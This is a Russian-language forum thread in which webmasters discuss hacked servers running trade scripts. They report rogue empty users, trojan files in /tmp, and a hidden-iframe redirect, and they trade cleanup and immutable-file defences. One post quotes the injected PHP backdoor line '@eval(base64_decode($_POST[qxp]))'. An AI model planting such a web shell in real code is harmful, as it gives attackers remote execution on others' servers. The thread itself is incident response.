Новая тема   Ответить

 MadDok
Soft-Com: я сделал проще, удалил каталог gals , похоже скрипт глюкал при названии папки p2.php_files, теперь он ничего не пишет и тем не менее @eval(base64_decode($_POST[qxp]));//'; появляется стабильно.

Последний раз редактировалось: MadDok (09/10/09 в 17:02), всего редактировалось 1 раз

 Darkest
на нескольких доменах на разных серверах нашел пустых юзеров. удалил, пропатчился. в variables.php ничего левого нету, flie check везде на все сказал ОК. но в /tmp на обоих серверах есть много пустых *ses.tmp
доктор, я здоров или таки поломали? поубивать все эти *ses.tmp и спать спокойно?

 Vyacheslav
Почти на 90% сайтов был пустой юзер, но кроме него ничего подозрительного не нашел..
Где именно этот /tmp? В корне самого сервака?

 fihorn


это директория в корне сервера
обычно юзеры, которые даются хостером - не имеют к ней доступа. если есть рут на сервере или свой админ - можно увидеть.

файлы в этой директории - сессии залогиненных веб-юзеров, например, вебмастеров, залогиненных в тгп-скрипт или ваши собственные в трейд-скриптах.
поэтому они появляются.

сами файлы с эксплойтом выглядят как
ses.tmp
ases.tmp
а вот те файлы, которые начинаются на ses и выглядят как ses_4534584583454.tmp - это и есть сессии залогиненных юзеров.
если их стереть - просто юзерам придется перелогиниться. в этом нет ничего критического по сути.

 Vyacheslav
Странно, но даже под рутом не смог удалить
ses.tmp
ases.tmp
..
В них какойто зазенденный код.

Еще есть куча в /tmp нулевого размера файлов
bses.tmp
cses.tmp
dses.tmp
...
xses.tmp
yses.tmp
это что такое?

 Soft-Com
это всё код трояна, который инклюдится при выполнении даже любого смартового скрипта - удаляй

 Vyacheslav
не удаляются, суки...

 fihorn

вообще это довольно дико, если под рутом они не удаляются.
у тебя точно полноценный дедик? может это джейл какой-нибудь? тогда надо пинать суппорт хостера

 Soft-Com
а можно это как-то увидеть?

 Darkest
У меня тоже не удалялись под рутом. Саппорт вебазиллы сказал: "Данные файлы удалять не стоит, это является временным средством защиты от взлома"
Удалять пытался уже после того как пропатчил смарты. Мож так и должно быть...

 Vyacheslav
fihorn! Я уверен, что у меня дедики!
Сапорт сказал примерно то же самое, что и Darkestу..

 morex
toge nashel u sebya

 Alex AWM
Админы могли сами создать пустые файлы, и повесить аттрибут immutable -- чтобы туда нельзя было записать код эксплойта. (У такого аттрибута приоритет выше чем у прав пользователей, хотя по идее рут должен их сносить). Или поставили на них права 000

 MadDok
yo: ну что, ты какнибудь сумел исправить эту проблему?

 fihorn
ну если вы под рутом не можете удалить файлы - то, скорее всего, нужно обратиться к суппорту хостера. если это вебазилла - то, наверное, ребята тоже участвуют в решении проблемы и знают, почему вдруг файлы стали неудаляемые.

вот Alex AWM написал же про пустые файлы и 000. это старая проверенная техника, работает.

 Perlover
Soft-Com писал:
Кто трейдит с DonKinky и его подругой Webmiss Lizzet, проверьте трейды с ними
У них точно такой же редирект вставляется при первом клике:
Код:
То есть, на их сайтах (пример http://www.realitypictures.net/) кликаем - открывается окно с этим кодом. Оно, судя по коду, вставляет скрытый фрейм в opener - то есть в окно, которое открыло линк, то есть в сам сайт DonKinky, а затем себя перегружает (открывает галлеру/трейд). У меня нет сейчас аськи до понедельника, но если кто может, посодействуйте, чтобы они убрали это г....;-)

 perdola
у меня в thumbs есть странные файлы типа kgjsdkjsdjk.jpg но фишка в том что они открываются как картинки и это нормальные тумбы, но название отличается от других тумб в директории и так почти в каждой директории, это нормально?

 basta
нормально, названия тумб рандомом генерятся, мало ли что может получиться )

 weely6
а может и повториться